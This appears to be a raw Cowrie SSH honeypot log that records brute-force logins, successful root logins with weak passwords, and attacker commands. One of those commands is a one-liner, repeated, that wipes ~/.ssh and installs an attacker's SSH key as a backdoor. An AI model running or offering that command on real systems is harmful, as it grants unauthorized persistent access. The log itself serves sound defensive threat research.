{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:42:40.649946Z","src_ip":"45.159.112.103","session":"8df293a8aae1"}
{"eventid":"cowrie.session.connect","src_ip":"36.89.28.139","src_port":49106,"dst_ip":"1.2.3.4","dst_port":22,"session":"6b61243e4d17","protocol":"ssh","message":"New connection: 36.89.28.139:49106 (1.2.3.4:22) [session: 6b61243e4d17]","sensor":"my-vps","timestamp":"2025-08-26T00:42:40.698642Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:42:40.699521Z","src_ip":"36.89.28.139","session":"6b61243e4d17"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:42:40.758984Z","src_ip":"45.159.112.103","session":"8df293a8aae1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:42:40.760230Z","src_ip":"45.159.112.103","session":"8df293a8aae1"}
{"eventid":"cowrie.session.connect","src_ip":"45.159.112.103","src_port":49080,"dst_ip":"1.2.3.4","dst_port":22,"session":"3581aec58df6","protocol":"ssh","message":"New connection: 45.159.112.103:49080 (1.2.3.4:22) [session: 3581aec58df6]","sensor":"my-vps","timestamp":"2025-08-26T00:42:40.879856Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:42:40.881052Z","src_ip":"45.159.112.103","session":"3581aec58df6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:42:40.887327Z","src_ip":"36.89.28.139","session":"6b61243e4d17"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:42:40.995125Z","src_ip":"45.159.112.103","session":"3581aec58df6"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:42:41.189400Z","src_ip":"24.108.102.132","session":"30976ed0070f"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:42:41.493659Z","src_ip":"45.159.112.103","session":"3581aec58df6"}
{"eventid":"cowrie.login.failed","username":"rocky","password":"123456","message":"login attempt [rocky/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T00:42:41.683090Z","src_ip":"36.89.28.139","session":"6b61243e4d17"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:42:42.356572Z","src_ip":"24.108.102.132","session":"30976ed0070f"}
{"eventid":"cowrie.session.connect","src_ip":"24.108.102.132","src_port":55354,"dst_ip":"1.2.3.4","dst_port":22,"session":"e5e18a0a9cd1","protocol":"ssh","message":"New connection: 24.108.102.132:55354 (1.2.3.4:22) [session: e5e18a0a9cd1]","sensor":"my-vps","timestamp":"2025-08-26T00:42:42.507346Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:42:42.518440Z","src_ip":"24.108.102.132","session":"e5e18a0a9cd1"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:42:42.609761Z","src_ip":"45.159.112.103","session":"3581aec58df6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:42:42.686437Z","src_ip":"24.108.102.132","session":"e5e18a0a9cd1"}
{"eventid":"cowrie.session.connect","src_ip":"45.159.112.103","src_port":49084,"dst_ip":"1.2.3.4","dst_port":22,"session":"a56aac624699","protocol":"ssh","message":"New connection: 45.159.112.103:49084 (1.2.3.4:22) [session: a56aac624699]","sensor":"my-vps","timestamp":"2025-08-26T00:42:42.725163Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:42:42.726081Z","src_ip":"45.159.112.103","session":"a56aac624699"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:42:42.842545Z","src_ip":"45.159.112.103","session":"a56aac624699"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:42:42.873877Z","src_ip":"36.89.28.139","session":"6b61243e4d17"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:42:43.340762Z","src_ip":"24.108.102.132","session":"e5e18a0a9cd1"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:42:43.348657Z","src_ip":"45.159.112.103","session":"a56aac624699"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:42:43.456550Z","src_ip":"45.159.112.103","session":"8df293a8aae1"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:42:43.465354Z","src_ip":"45.159.112.103","session":"a56aac624699"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:42:43.497921Z","src_ip":"24.108.102.132","session":"8874bd3e1ea2"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:42:43.508928Z","src_ip":"24.108.102.132","session":"e5e18a0a9cd1"}
{"eventid":"cowrie.session.connect","src_ip":"24.108.102.132","src_port":46520,"dst_ip":"1.2.3.4","dst_port":22,"session":"d16b0ea20527","protocol":"ssh","message":"New connection: 24.108.102.132:46520 (1.2.3.4:22) [session: d16b0ea20527]","sensor":"my-vps","timestamp":"2025-08-26T00:43:42.719994Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:43:42.730731Z","src_ip":"24.108.102.132","session":"d16b0ea20527"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:43:42.898207Z","src_ip":"24.108.102.132","session":"d16b0ea20527"}
{"eventid":"cowrie.session.connect","src_ip":"45.159.112.103","src_port":44640,"dst_ip":"1.2.3.4","dst_port":22,"session":"5700e2d691ce","protocol":"ssh","message":"New connection: 45.159.112.103:44640 (1.2.3.4:22) [session: 5700e2d691ce]","sensor":"my-vps","timestamp":"2025-08-26T00:43:43.334065Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:43:43.335042Z","src_ip":"45.159.112.103","session":"5700e2d691ce"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:43:43.437869Z","src_ip":"45.159.112.103","session":"5700e2d691ce"}
{"eventid":"cowrie.login.failed","username":"khan","password":"khan","message":"login attempt [khan/khan] failed","sensor":"my-vps","timestamp":"2025-08-26T00:43:43.553792Z","src_ip":"24.108.102.132","session":"d16b0ea20527"}
{"eventid":"cowrie.login.success","username":"root","password":"rootadmin@123","message":"login attempt [root/rootadmin@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:43:43.889362Z","src_ip":"45.159.112.103","session":"5700e2d691ce"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:43:44.170762Z","src_ip":"45.159.112.103","session":"5700e2d691ce"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:43:44.171459Z","src_ip":"45.159.112.103","session":"5700e2d691ce"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:43:44.172339Z","src_ip":"45.159.112.103","session":"5700e2d691ce"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:43:44.276530Z","src_ip":"45.159.112.103","session":"5700e2d691ce"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:43:44.499798Z","src_ip":"45.159.112.103","session":"5700e2d691ce"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:43:44.500530Z","src_ip":"45.159.112.103","session":"5700e2d691ce"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:43:44.605429Z","src_ip":"45.159.112.103","session":"5700e2d691ce"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:43:44.606367Z","src_ip":"45.159.112.103","session":"5700e2d691ce"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:43:44.717257Z","src_ip":"24.108.102.132","session":"d16b0ea20527"}
{"eventid":"cowrie.session.connect","src_ip":"45.159.112.103","src_port":44644,"dst_ip":"1.2.3.4","dst_port":22,"session":"ba1829135973","protocol":"ssh","message":"New connection: 45.159.112.103:44644 (1.2.3.4:22) [session: ba1829135973]","sensor":"my-vps","timestamp":"2025-08-26T00:43:44.718213Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:43:44.718791Z","src_ip":"45.159.112.103","session":"ba1829135973"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:43:44.826833Z","src_ip":"45.159.112.103","session":"ba1829135973"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:43:45.298526Z","src_ip":"45.159.112.103","session":"ba1829135973"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:43:46.409776Z","src_ip":"45.159.112.103","session":"ba1829135973"}
{"eventid":"cowrie.session.connect","src_ip":"45.159.112.103","src_port":44654,"dst_ip":"1.2.3.4","dst_port":22,"session":"0ec4b1ac2af8","protocol":"ssh","message":"New connection: 45.159.112.103:44654 (1.2.3.4:22) [session: 0ec4b1ac2af8]","sensor":"my-vps","timestamp":"2025-08-26T00:43:46.521791Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:43:46.522552Z","src_ip":"45.159.112.103","session":"0ec4b1ac2af8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-s